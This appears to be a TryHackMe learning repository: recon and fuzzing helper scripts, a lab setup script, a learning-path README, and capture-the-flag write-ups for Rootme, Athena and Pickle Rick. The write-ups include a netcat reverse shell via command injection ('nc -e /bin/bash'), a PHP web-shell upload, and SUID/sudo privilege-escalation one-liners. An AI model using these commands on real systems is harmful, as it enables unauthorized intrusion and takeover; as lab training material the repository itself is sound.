├── Scripts ├── victim.sh ├── scan.sh ├── fuzz │ ├── fuzzer_2.js │ ├── fuzzer.js │ └── fuzzer_3.js └── setup.sh ├── Writeups ├── rootme.md ├── athena.md └── pickle-rick.md └── README.md /Scripts/victim.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | if [ "$#" -ne 3 ]; then 5 | echo "Usage: $0 " 6 | exit 1 7 | fi 8 | 9 | ip="$1" 10 | domain="$2" 11 | platform="$3" 12 | hosts_file="/etc/hosts" 13 | zshrc_file="$HOME/.zshrc" 14 | 15 | if grep -q "$domain" "$hosts_file"; then 16 | sudo sed -i "/$domain/d" "$hosts_file" 17 | fi 18 | 19 | platform_section=$(grep -nE "# ====== $platform ======" "$hosts_file" | cut -d':' -f1) 20 | if [ -n "$platform_section" ]; then 21 | sudo sed -i "${platform_section}a $ip $domain" "$hosts_file" 22 | else 23 | echo -e "\n# ====== $platform ======" | sudo tee -a "$hosts_file" 24 | echo "$ip $domain" | sudo tee -a "$hosts_file" 25 | fi 26 | 27 | if grep -q "export VMIP=" "$zshrc_file"; then 28 | sed -i "/export VMIP=/d" "$zshrc_file" 29 | fi 30 | 31 | echo "export VMIP=\"$ip\"" >> "$zshrc_file" 32 | echo "Entry added/updated in /etc/hosts under platform $platform:" 33 | grep "$domain" "$hosts_file" 34 | echo "VMIP variable updated in $zshrc_file:" 35 | grep "export VMIP=" "$zshrc_file" 36 | -------------------------------------------------------------------------------- /Scripts/scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "$#" -ne 2 ]; then 4 | echo "Usage: $0 " 5 | exit 1 6 | fi 7 | 8 | 9 | 10 | target="$1" 11 | output_location="$2" 12 | echo "Scanning ports on $target..." 13 | results=$(sudo nmap -p- --min-rate 10000 -Pn -vv -oG "$output_location" "$target" 2>&1) 14 | 15 | if [ $? 
-eq 0 ]; then 16 | open_ports=$(echo "$results" | grep -oP '\d+/open' | cut -d'/' -f1) 17 | closed_ports=$(echo "$results" | grep -oP '\d+/closed' | cut -d'/' -f1) 18 | filtered_ports=$(echo "$results" | grep -oP '\d+/filtered' | cut -d'/' -f1) 19 | 20 | printf "---------------------------------- %s ------------------------------\n" "$target" 21 | printf "| Open | Closed | Filtered |\n" 22 | printf "| %-6s | %-6s | %-8s |\n" "$open_ports" "$closed_ports" "$filtered_ports" 23 | printf "--------------------------------------------\n" 24 | 25 | echo "Scan results saved to: $output_location" 26 | else 27 | echo "Error: Failed to run nmap. Please make sure it is installed and try again." 28 | fi 29 | -------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer_2.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt 4 | 5 | const fs = require('fs').promises; 6 | const axios = require('axios'); 7 | 8 | async function fuzzWithWordlist(baseURL, wordlistPath) { 9 | try { 10 | const data = await fs.readFile(wordlistPath, 'utf-8'); 11 | const words = data.split('\n'); 12 | 13 | const concurrency = 100; 14 | 15 | await Promise.all(words.map(async word => { 16 | try { 17 | const url = baseURL.replace("ATTACK", word); 18 | const response = await axios.get(url); 19 | if (response.status === 200) { 20 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 21 | } 22 | } catch (error) { 23 | } 24 | })); 25 | 26 | } catch (error) { 27 | console.error(`[-] Error reading wordlist file: ${error.message}`); 28 | } 29 | } 30 | 31 | const args = process.argv.slice(2); 32 | if (args.length !== 2) { 33 | console.error("Usage: node fuzzer_2.js "); 34 | process.exit(1); 35 | } 36 | 37 | const baseURL = args[0]; 38 | const wordlistPath = args[1]; 39 | 40 | fuzzWithWordlist(baseURL, wordlistPath); 41 | 
-------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt 4 | 5 | const fs = require('fs').promises; 6 | const axios = require('axios'); 7 | 8 | async function fuzzWithWordlist(baseURL, wordlistPath) { 9 | try { 10 | const data = await fs.readFile(wordlistPath, 'utf-8'); 11 | const words = data.split('\n'); 12 | 13 | const concurrency = 500; 14 | 15 | const processBatch = async (start, end) => { 16 | const batch = words.slice(start, end); 17 | await Promise.all(batch.map(async word => { 18 | try { 19 | const url = baseURL.replace("ATTACK", word); 20 | const response = await axios.get(url); 21 | if (response.status === 200) { 22 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 23 | } 24 | } catch (error) { 25 | } 26 | })); 27 | }; 28 | 29 | let start = 0; 30 | while (start < words.length) { 31 | const end = Math.min(start + concurrency, words.length); 32 | await processBatch(start, end); 33 | start = end; 34 | } 35 | 36 | } catch (error) { 37 | console.error(`[-] Error reading wordlist file: ${error.message}`); 38 | } 39 | } 40 | 41 | 42 | const args = process.argv.slice(2); 43 | if (args.length !== 2) { 44 | console.error("Usage: node fuzzer.js "); 45 | process.exit(1); 46 | } 47 | 48 | const baseURL = args[0]; 49 | const wordlistPath = args[1]; 50 | 51 | fuzzWithWordlist(baseURL, wordlistPath); 52 | -------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer_3.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt parallel 4 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt sequential 5 | 6 | 7 | const fs = 
require('fs').promises; 8 | const axios = require('axios'); 9 | 10 | async function fuzzWithWordlist(baseURL, wordlistPath, mode) { 11 | try { 12 | const data = await fs.readFile(wordlistPath, 'utf-8'); 13 | const words = data.split('\n'); 14 | 15 | if (mode === 'parallel') { 16 | console.log("Using parallel fuzzing..."); 17 | await parallelFuzzing(baseURL, words); 18 | } else if (mode === 'sequential') { 19 | console.log("Using sequential fuzzing..."); 20 | await sequentialFuzzing(baseURL, words); 21 | } else { 22 | console.error("Invalid mode. Please choose either 'parallel' or 'sequential'."); 23 | } 24 | 25 | } catch (error) { 26 | console.error(`[-] Error reading wordlist file: ${error.message}`); 27 | } 28 | } 29 | 30 | async function sequentialFuzzing(baseURL, words) { 31 | for (const word of words) { 32 | try { 33 | const url = baseURL.replace("ATTACK", word); 34 | const response = await axios.get(url); 35 | if (response.status === 200) { 36 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 37 | } 38 | } catch (error) { 39 | } 40 | } 41 | } 42 | 43 | async function parallelFuzzing(baseURL, words) { 44 | const concurrency = 1000; 45 | await Promise.all(words.map(async word => { 46 | try { 47 | const url = baseURL.replace("ATTACK", word); 48 | const response = await axios.get(url); 49 | if (response.status === 200) { 50 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 51 | } 52 | } catch (error) { 53 | } 54 | })); 55 | } 56 | 57 | const args = process.argv.slice(2); 58 | if (args.length !== 3) { 59 | console.error("Usage: node fuzzer.js "); 60 | console.error("Mode: 'parallel' or 'sequential'"); 61 | process.exit(1); 62 | } 63 | 64 | const baseURL = args[0]; 65 | const wordlistPath = args[1]; 66 | const mode = args[2]; 67 | 68 | fuzzWithWordlist(baseURL, wordlistPath, mode); 69 | -------------------------------------------------------------------------------- /Writeups/rootme.md: 
-------------------------------------------------------------------------------- 1 | # Rootme 2 | 3 | ![](https://tryhackme-images.s3.amazonaws.com/room-icons/11d59cb34397e986062eb515f4d32421.png) 4 | 5 | ## Scanning 6 | 7 | ```bash 8 | nmap -T4 -A -p- MACHINE_IP 9 | Nmap scan report for MACHINE_IP 10 | Host is up (0.15s latency). 11 | Not shown: 65464 closed ports, 69 filtered ports 12 | PORT STATE SERVICE VERSION 13 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 14 | | ssh-hostkey: 15 | | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) 16 | | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA) 17 | |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519) 18 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 19 | | http-cookie-flags: 20 | | /: 21 | | PHPSESSID: 22 | |_ httponly flag not set 23 | |_http-server-header: Apache/2.4.29 (Ubuntu) 24 | |_http-title: HackIT - Home 25 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 26 | ``` 27 | 28 | ## Dir bruteforce: 29 | 30 | 31 | ```bash 32 | gobuster dir -u MACHINE_IP -w /usr/share/wordlists/dirb/common.txt 33 | =============================================================== 34 | 35 | /.hta (Status: 403) 36 | /.htpasswd (Status: 403) 37 | /.htaccess (Status: 403) 38 | /css (Status: 301) 39 | /index.php (Status: 200) 40 | /js (Status: 301) 41 | /panel (Status: 301) 42 | /server-status (Status: 403) 43 | /uploads (Status: 301) 44 | ``` 45 | 46 | ## Exploitation 47 | 48 | 49 | * `http://MACHINE_IP/panel/` has a file upload, I already know what I'm gonna do. 
50 | 51 | * Let's listen on our port `nc -lvnp 4444`, then upload our shell `shell.phtml` 52 | 53 | * Get a shell by: `curl http://MACHINE_IP/uploads/shell.phtml` 54 | 55 | * Find our flag - `find | grep "user.txt" 2>/dev/null` 56 | 57 | ## Privilege Escalation 58 | 59 | `find / -user root -perm /4000` 60 | 61 | ```bash 62 | /usr/bin/newuidmap 63 | /usr/bin/newgidmap 64 | /usr/bin/chsh 65 | /usr/bin/python 66 | /usr/bin/chfn 67 | /usr/bin/gpasswd 68 | /usr/bin/sudo 69 | /usr/bin/newgrp 70 | /usr/bin/passwd 71 | /usr/bin/pkexec 72 | /bin/mount 73 | /bin/su 74 | /bin/fusermount 75 | /bin/ping 76 | /bin/umount 77 | /usr/bin/python this one looks interesting 78 | ``` 79 | 80 | * Since `/usr/bin/python` has the SUID bit, we can promote our shell to root! 81 | 82 | ```bash 83 | python -c 'import os; os.execl("/bin/sh", "sh", "-p")' 84 | ``` 85 | 86 | ```bash 87 | whoami 88 | root 89 | 90 | cd /root 91 | ``` 92 | 93 | ## Flags 94 | 95 |
96 | user.txt 97 | 98 | ```bash 99 | THM{y0u_g0t_a_sh3l} 100 | ``` 101 | 102 |
103 | 104 |
105 | root.txt 106 | 107 | ```bash 108 | THM{pr1v1l3g3_3sc4l4t10n} 109 | ``` 110 | 111 |
112 | 113 | ## Thank You! 114 | -------------------------------------------------------------------------------- /Writeups/athena.md: -------------------------------------------------------------------------------- 1 | 2 | ![](https://tryhackme-images.s3.amazonaws.com/room-icons/53d3c28c1af197142685ceb238d5ce3c.png) 3 | 4 | ## Nmap Scan 5 | 6 | ```bash 7 | PORT STATE SERVICE REASON 8 | 22/tcp open ssh syn-ack ttl 63 9 | 80/tcp open http syn-ack ttl 63 10 | 139/tcp open netbios-ssn syn-ack ttl 63 11 | 445/tcp open microsoft-ds syn-ack ttl 63 12 | ``` 13 | 14 | ## Web Pwn 15 | 16 | * On port 80 => there is a web page. 17 | 18 | * SMB allows anonymous login; there is a file containing a hidden directory on the web page: `/myrouterpanel` 19 | 20 | ```bash 21 | > smbclient \\\\$VMIP\\public 22 | Password for [WORKGROUP\trevohack]: 23 | Anonymous login successful 24 | Try "help" to get a list of possible commands. 25 | smb: \> ls 26 | . D 0 Mon Apr 17 06:24:43 2023 27 | .. D 0 Mon Apr 17 06:24:05 2023 28 | msg_for_administrator.txt N 253 Mon Apr 17 00:29:44 2023 29 | 30 | 19947120 blocks of size 1024. 9693196 blocks available 31 | smb: \> get msg_for_administrator.txt 32 | getting file \msg_for_administrator.txt of size 253 as msg_for_administrator.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) 33 | smb: \> 34 | ``` 35 | 36 | * `/myrouterpanel` is vulnerable to RCE; `$(nc -e /bin/bash)` will get a reverse shell as `www-data` 37 | 38 | ## Priv Escalate to Athena 39 | 40 | * From there, a `backup.sh` file is available at `/usr/share/backup`, which `pspy` shows running repeatedly. 
41 | 42 | * `ls -la` shows this 43 | 44 | ```bash 45 | -rwxr-xr-x 1 www-data athena 310 Sep 16 19:01 backup.sh 46 | ``` 47 | 48 | * Injecting a reverse shell may give a shell as `athena` 49 | 50 | ```bash 51 | > nc -nvlp 9090 52 | Listening on 0.0.0.0 9090 53 | Connection received on 10.10.236.162 41090 54 | bash: no job control in this shell 55 | athena@routerpanel:/$ whoami 56 | athena 57 | ``` 58 | 59 | ## Priv Escalate to root 60 | 61 | * On athena `sudo -l -l` reveals that `/mnt/.../secret/venom.ko` can be loaded to the kernel 62 | 63 | 64 | ```bash 65 | athena@routerpanel:/$ sudo -l -l 66 | Matching Defaults entries for athena on routerpanel: 67 | env_reset, mail_badpass, 68 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 69 | User athena may run the following commands on routerpanel: 70 | Sudoers entry: 71 | RunAsUsers: root 72 | Options: !authenticate 73 | Commands: 74 | /usr/sbin/insmod /mnt/.../secret/venom.ko 75 | ``` 76 | 77 | * USE Ghidra: to reverse the venom.ko file 78 | 79 | ![](https://i.postimg.cc/RFR6NDRs/reverse.png) 80 | 81 | ![](https://i.postimg.cc/qRjqkCJW/reversing.png) 82 | 83 | * After reversing, the `give_root` function may work like this `kill -57 `, later on the `id` command reveals that you have root access. 84 | 85 | # Thank You!! 86 | -------------------------------------------------------------------------------- /Scripts/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # Trevohack's TryHackMe Lab Setup 5 | # curl -O https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/setup.sh && chmod +x setup.sh && ./setup.sh 6 | 7 | sudo mkdir -p /opt/utils/ 8 | sudo mkdir -p /opt/wordlists/ 9 | sudo mkdir -p ~/THM/ 10 | sudo mkdir -p ~/THM/Writeups/ 11 | sudo mkdir -p ~/THM/VPN/ 12 | 13 | install_package() { 14 | package_name=$1 15 | echo "Installing $package_name..." 
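sudo apt-get install -y $package_name
}

# allow_port PORT: open PORT for incoming traffic in ufw.
# The argument is quoted so it is passed to ufw verbatim rather than word-split.
allow_port() {
    port="$1"
    echo "Allowing incoming traffic on port $port..."
    sudo ufw allow "$port"
}
sudo ufw enable
allow_port 1337 # Adjust to your specific needs
allow_port 4444 # Adjust to your specific needs
allow_port 8000 # Adjust to your specific needs
allow_port 9001 # Adjust to your specific needs
allow_port 31337 # Adjust to your specific needs

echo "Allowing ICMP (ping)..."
# NOTE(review): ufw takes a port/protocol or an application profile here; "icmp" is
# neither, so this command is likely to fail -- confirm on the target distribution.
sudo ufw allow icmp
echo "Allowing all outgoing connections..."
sudo ufw default allow outgoing
echo "CTF-friendly firewall configuration complete!"

# NOTE(review): these directories are created via sudo, so they end up root-owned;
# the unprivileged wget/chmod calls below write into /opt/utils and /opt/wordlists
# and will fail unless ownership is adjusted -- confirm before relying on this script.
sudo mkdir -p /opt/utils/
sudo mkdir -p /opt/wordlists/
sudo mkdir -p ~/THM/
sudo mkdir -p ~/THM/Writeups/
sudo mkdir -p ~/THM/VPN/

install_package "nmap"
install_package "metasploit-framework"
install_package "httpie"
install_package "lynx"

# Every download below is fetched over the network and made executable (or installed
# with dpkg) without any checksum or signature check. Pin an expected SHA-256
# (<SHA256_PLACEHOLDER>) per artifact and compare with `sha256sum -c` before chmod +x
# or dpkg -i, so a tampered or substituted release cannot be run on the lab host.
# `cd ... || exit 1` guards against downloading into whatever the current directory
# happens to be when /opt/utils is missing or unreadable.
echo "Installing rustscan..."
cd /opt/utils || exit 1
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
sudo dpkg -i rustscan_2.0.1_amd64.deb
rm rustscan_2.0.1_amd64.deb

echo "Installing pspy64..."
cd /opt/utils || exit 1
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

echo "Downloading linpeas.sh..."
cd /opt/utils || exit 1
wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh
chmod +x linpeas.sh

echo "Downloading linux-exploit-suggestor.sh..."
cd /opt/utils || exit 1
wget https://github.com/mzet-/linux-exploit-suggester/raw/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh

echo "Downloading wordlists..."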
70 | cd /opt/wordlists 71 | wget https://github.com/assetnote/commonspeak2-wordlists/raw/master/subdomains/subdomains.txt 72 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt 73 | 74 | 75 | echo 'export LHOST="$(ip -o -4 addr show tun0 | awk '\''{print $4}'\'' | cut -d "/" -f 1)"' >> $HOME/.zshrc 76 | echo 'export ROCKYOU="/opt/wordlists/rockyou-75.txt"' >> $HOME/.zshrc 77 | echo 'alias vpn="sudo openvpn ~/THM/VPN/> $HOME/.zshrc 78 | 79 | curl https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/victim.sh -O /opt/utils/victim.sh && chmod +x /opt/utils/victim.sh && cp /opt/utils/victim.sh /usr/bin/victim 80 | curl https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/scan.sh -O /opt/utils/scan.sh && chmod +x /opt/utils/scan.sh && cp /opt/utils/scan.sh /usr/bin/scanhost 81 | 82 | echo "Installation complete!" 83 | 84 | -------------------------------------------------------------------------------- /Writeups/pickle-rick.md: -------------------------------------------------------------------------------- 1 | 2 | # Pickle Rick - TryHackMe 3 | 4 | ```bash 5 | ❯ victim -i '10.10.84.218' 6 | Saved! 7 | ``` 8 | 9 | ## Nmap Scans 10 | 11 | ``` 12 | Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-05 15:35 +0530 13 | Initiating Parallel DNS resolution of 1 host. at 15:35 14 | Completed Parallel DNS resolution of 1 host. 
at 15:35, 0.00s elapsed 15 | Initiating SYN Stealth Scan at 15:35 16 | Scanning 10.10.84.218 (10.10.84.218) [65535 ports] 17 | Discovered open port 80/tcp on 10.10.84.218 18 | Discovered open port 22/tcp on 10.10.84.218 19 | Completed SYN Stealth Scan at 15:35, 8.97s elapsed (65535 total ports) 20 | Nmap scan report for 10.10.84.218 (10.10.84.218) 21 | 22 | PORT STATE SERVICE REASON 23 | 22/tcp open ssh syn-ack ttl 63 24 | 80/tcp open http syn-ack ttl 63 25 | ``` 26 | 27 | * Open ports: 22 (ssh), 80 (http) 28 | 29 | ## Web Enumeration 30 | 31 | ![webpage](https://i.postimg.cc/nLGcQFR1/webpage.png) 32 | 33 | * Dirsearch results 34 | 35 | ```bash 36 | ❯ dirsearch -u http://$VMIP/ -w /opt/wordlists/big.txt -e .php 200 37 | _|. _ _ _ _ _ _|_ v0.4.2 38 | (_||| _) (/_(_|| (_| ) 39 | 40 | Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 20477 41 | 42 | Output File: /home/trevohack/.dirsearch/reports/10.10.84.218/-_23-10-05_16-01-07.txt 43 | 44 | Error Log: /home/trevohack/.dirsearch/logs/errors-23-10-05_16-01-07.log 45 | 46 | Target: http://10.10.84.218/ 47 | 48 | [16:01:08] Starting: 49 | [16:01:13] 200 - 882B - /login.php 50 | [16:01:30] 301 - 313B - /assets -> http://10.10.84.218/assets/ 51 | [16:03:33] 200 - 17B - /robots.txt 52 | [16:03:41] 403 - 300B - /server-status 53 | ``` 54 | 55 | * Found a login panel `/login.php` 56 | 57 | * `robots.txt` reveals some text `Wubbalubbadubdub` 58 | 59 | * The `html` source of the main page reveals a username 60 | 61 | ```html 62 | 69 | ``` 70 | 71 | * Login to the site using the creds `R1ckRul3s:Wubbalubbadubdub` 72 | 73 | ![logon](https://i.postimg.cc/g08LtbMw/login.png) 74 | 75 | * You will be presented with a command panel from which commands can be injected into the server. 
76 | 77 | ![command](https://i.postimg.cc/mhf0wMh1/command-panel.png) 78 | 79 | ## Getting a shell 80 | 81 | 82 | * Run a bash rev shell on the server to obtain a shell as `www-data` 83 | 84 | ![shell-got](https://i.postimg.cc/26BY7CTJ/shell.png) 85 | 86 | ### Ingredients 87 | 88 | ```bash 89 | $ cat /var/www/html/Sup3rS3cretPickl3Ingred.txt 90 | mr. meeseek hair 91 | ``` 92 | 93 | * Exploring the files you may find the second ingredient easily 94 | 95 | ```bash 96 | cat '/home/rick/second ingredients' 97 | 1 jerry tear 98 | ``` 99 | 100 | ## Privilege Escalation 101 | 102 | * Running `sudo -l -l` shows that `www-data` can run anything without password 103 | 104 | ```bash 105 | www-data@ip-10-10-84-218:/home/rick$ sudo -l -l 106 | sudo -l -l 107 | Matching Defaults entries for www-data on 108 | ip-10-10-84-218.eu-west-1.compute.internal: 109 | env_reset, mail_badpass, 110 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 111 | 112 | User www-data may run the following commands on 113 | ip-10-10-84-218.eu-west-1.compute.internal: 114 | 115 | Sudoers entry: 116 | RunAsUsers: ALL 117 | Options: !authenticate 118 | Commands: 119 | ALL 120 | ``` 121 | 122 | ```bash 123 | www-data@ip-10-10-84-218:/home/rick$ sudo su - root 124 | sudo su - root 125 | mesg: ttyname failed: Inappropriate ioctl for device 126 | id 127 | uid=0(root) gid=0(root) groups=0(root) 128 | cd /root 129 | ls 130 | 3rd.txt 131 | snap 132 | cat 3rd.txt 133 | 3rd ingredients: fleeb juice 134 | ``` 135 | 136 | ## CTF Done 137 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 |
6 | 7 |

TryHackMe - Hackers Learning Path

8 | 9 | 10 | * Below is a series of rooms/machines in TryHackMe for beginners in cyber security to learn and practice. 11 | 12 | ## Ultimate Setup 13 | 14 | * Configure the environment in one line! 15 | 16 | ```bash 17 | trevohack@anonymous $ curl -O https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/setup.sh && chmod +x setup.sh && ./setup.sh 18 | ``` 19 | 20 | ## Beginner Level Theory - [ 0x1 - 0x6 ] 21 | 22 | - [Tutorial](https://tryhackme.com/room/tutorial) 23 | - [Beginner](https://tryhackme.com/room/beginnerpathintro) 24 | 25 | ### Linux & Bash 26 | 27 | - [Linux](https://tryhackme.com/room/linuxfundamentalspart1) 28 | - [Linux 2](https://tryhackme.com/room/linuxfundamentalspart2) 29 | - [Linux 3](https://tryhackme.com/room/linuxfundamentalspart3) 30 | - [Bash Scripting](https://tryhackme.com/room/bashscripting) 31 | - [Linux Modules](https://tryhackme.com/room/linuxmodules) 32 | 33 | 34 | ### Acquainting yourself with tools 35 | 36 | > **Acquainting** yourself with tools in cybersecurity involves learning how to effectively use software, hardware, and techniques to secure digital systems and networks against cyber threats. 37 | 38 | #### Nmap & Networking 39 | 40 | > Nmap, short for "Network Mapper," is a powerful network scanning and exploration tool used in cybersecurity. It's designed to discover hosts, services, and vulnerabilities within a computer network. Nmap employs various scanning techniques, like TCP, UDP, SYN, and ICMP scans, to identify open ports, services running on those ports, and operating systems. This information is crucial for assessing network security, finding potential entry points, and strengthening defenses against potential threats. 
41 | 42 | - [Nmap 1](https://tryhackme.com/room/nmap01) 43 | - [Nmap 2](https://tryhackme.com/room/nmap02) 44 | - [Nmap 3](https://tryhackme.com/room/nmap03) 45 | - [Nmap 4](https://tryhackme.com/room/nmap04) 46 | - [Further Nmap](https://tryhackme.com/room/furthernmap) 47 | - [Networking](https://tryhackme.com/jr/introtonetworking) 48 | - [Networking Services](https://tryhackme.com/jr/networkservices) 49 | - [Protocols And Servers](https://tryhackme.com/jr/protocolsandservers) 50 | - [Protocols And Servers 2](https://tryhackme.com/jr/protocolsandservers2) 51 | 52 | #### Tmux: Terminal Configuration 53 | 54 | - [Tmux](https://tryhackme.com/room/rptmux) 55 | - [Tmux 2](https://tryhackme.com/room/tmuxremux) 56 | 57 | #### Burp Suite 58 | 59 | > Burp Suite: Essential tool for web app security testing, uncovering vulnerabilities and aiding in their resolution. 60 | 61 | - [Burp: The Basics](https://tryhackme.com/jr/burpsuitebasics) 62 | - [Burp: Repeater](https://tryhackme.com/jr/burpsuiterepeater) 63 | - [Burp: Intruder](https://tryhackme.com/jr/burpsuiterepeater) 64 | - [Burp: Other Modules](https://tryhackme.com/jr/burpsuiteom) 65 | 66 | #### Metasploit 67 | 68 | > Metasploit is a leading penetration testing tool for identifying and testing system vulnerabilities, widely used by cybersecurity professionals. 69 | 70 | - [Metasploit: Introduction](https://tryhackme.com/jr/metasploitintro) 71 | - [Metasploit: Exploitation](https://tryhackme.com/jr/metasploitexploitation) 72 | - [Metasploit: Meterpreter](https://tryhackme.com/jr/meterpreter) 73 | 74 | ### Web Penetration 75 | 76 | > Web penetration testing: Assessing web app security by simulating attacks to uncover and address vulnerabilities. 
77 | 78 | - [Walking An Application](https://tryhackme.com/jr/walkinganapplication) 79 | - [Content Discovery](https://tryhackme.com/jr/contentdiscovery) 80 | - [Subdomain Enumeration](https://tryhackme.com/jr/subdomainenumeration) 81 | - [Authentication Bypass](https://tryhackme.com/jr/authenticationbypass) 82 | - [IDOR](https://tryhackme.com/jr/idor) 83 | - [XSS](https://tryhackme.com/jr/xss) 84 | - [Command Injection](https://tryhackme.com/jr/oscommandinjection) 85 | - [SSRF](https://tryhackme.com/jr/ssrfqi) 86 | - [File Inclusion](https://tryhackme.com/jr/fileinc) 87 | - [SQL Injection](https://tryhackme.com/jr/sqlinjectionlm) 88 | 89 | ### Vulnerability Research 90 | 91 | - [Vulns](https://tryhackme.com/jr/vulnerabilities101) 92 | - [Exploitation](https://tryhackme.com/jr/exploitingavulnerabilityv2) 93 | - [Vulnerability Capstone](https://tryhackme.com/jr/vulnerabilitycapstone) 94 | 95 | ### Priv Escalation 96 | 97 | > Privilege escalation (priv esc) is the act of gaining higher levels of access or privileges than initially granted to a user or system. It involves exploiting vulnerabilities to elevate privileges, granting unauthorized access to resources or actions. This can be a critical step for attackers to gain control over a system, making it a crucial focus in security assessments to prevent unauthorized escalation of privileges. 
98 | 99 | - [Linux Priv Esc](https://tryhackme.com/jr/linprivesc) 100 | - [Windows Priv Esc](https://tryhackme.com/jr/windowsprivesc20) 101 | 102 | ### Other Essentials 103 | 104 | #### Python 105 | 106 | - [Python 1](https://tryhackme.com/room/pythonbasics) 107 | - [Python 2](https://tryhackme.com/room/pythonforcybersecurity) 108 | - [Flask](https://tryhackme.com/room/flask) 109 | 110 | #### Poc Scripting 111 | 112 | - [Poc Writing](https://tryhackme.com/room/intropocscripting) 113 | 114 | #### Javascript 115 | 116 | - [Javascript Basics](https://tryhackme.com/room/javascriptbasics) 117 | - [Jason](https://tryhackme.com/room/jason) 118 | 119 | 120 | 121 | ## Pro Level - [ 0x7 - 0xD ] 122 | 123 | ### Active Directory 124 | 125 | - [Enumerating AD](https://tryhackme.com/room/adenumeration) 126 | - [Breaching AD](https://tryhackme.com/room/breachingad) 127 | - [Lateral Movement & Pivoting](https://tryhackme.com/room/lateralmovementandpivoting) 128 | - [Exploiting AD](https://tryhackme.com/room/exploitingad) 129 | - [Persisting AD](https://tryhackme.com/room/persistingad) 130 | - [Holo](https://tryhackme.com/room/hololive) 131 | 132 | ### Buffer Overflow Exploitation 133 | 134 | - [Buffer Overflow Prep](https://tryhackme.com/jr/bufferoverflowprep) 135 | - [Brainstorm](https://tryhackme.com/jr/brainstorm) 136 | 137 | > You could get to this level or position after completing the above theory content and starting to practice through CTF challenges. 138 | 139 | 140 | ### CTF challenges 141 | 142 | > For the machines/rooms mentioned below writeups will be added soon! 
143 | 144 | #### Easy 145 | 146 | - [X] [ Rootme](https://tryhackme.com/room/rrootme) 147 | - [ ] [ Ignite](https://tryhackme.com/room/ignite) 148 | - [X] [ Pickle Rick](https://tryhackme.com/room/picklerick) 149 | - [ ] [ Cyborg](https://tryhackme.com/room/cyborgt8) 150 | - [ ] [ Tomghost](https://tryhackme.com/room/tomghost) 151 | - [ ] [ Source](https://tryhackme.com/room/source) 152 | - [ ] [ Res](https://tryhackme.com/room/res) 153 | - [ ] [ Lazy Admin](https://tryhackme.com/room/lazyadmin) 154 | - [ ] [ Overpass](https://tryhackme.com/room/overpass) 155 | - [ ] [ Startup](https://tryhackme.com/room/startup) 156 | - [ ] [ Wgel CTF](https://tryhackme.com/room/wgelctf) 157 | - [ ] [ Gaming Server](https://tryhackme.com/room/gamingserver) 158 | 159 | #### Medium 160 | 161 | - [X] [ Athena](https://tryhackme.com/room/4th3n4) 162 | - [ ] [ Wonderland](https://tryhackme.com/room/wonderland) 163 | - [ ] [ Mr Robot CTF](https://tryhackme.com/room/mrrobot) 164 | - [ ] [ dogcat](https://tryhackme.com/room/relevant) 165 | - [ ] [ The Marketplace](https://tryhackme.com/room/marketplace) 166 | - [ ] [ GoldenEye](https://tryhackme.com/room/goldeneye) 167 | 168 | #### Hard 169 | 170 | - [ ] [ Internal](https://tryhackme.com/room/internal) 171 | - [ ] [ Year of the fox](https://tryhackme.com/room/yotf) 172 | - [ ] [ Retro](https://tryhackme.com/room/retro) 173 | - [ ] [ Ra](https://tryhackme.com/room/ra) 174 | 175 | 176 | ``` 177 | Congrats! 🥳 If you have done all the rooms mentioned here, you are officially a penetration tester. You can go ahead in your career with other resources and platforms. 178 | ``` 179 | --------------------------------------------------------------------------------